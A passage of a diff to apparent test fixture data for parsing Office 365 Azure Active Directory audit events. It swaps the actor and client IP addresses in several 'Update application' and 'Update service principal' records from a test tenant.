"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20188,9 +20188,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { @@ -20393,7 +20393,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20423,9 +20423,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:37", "ExtendedProperties": [ { @@ -20628,7 +20628,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2595378Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620448\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"99a3d3e3-e4f6-4de7-96e0-6333564e1b25\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20658,9 +20658,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", 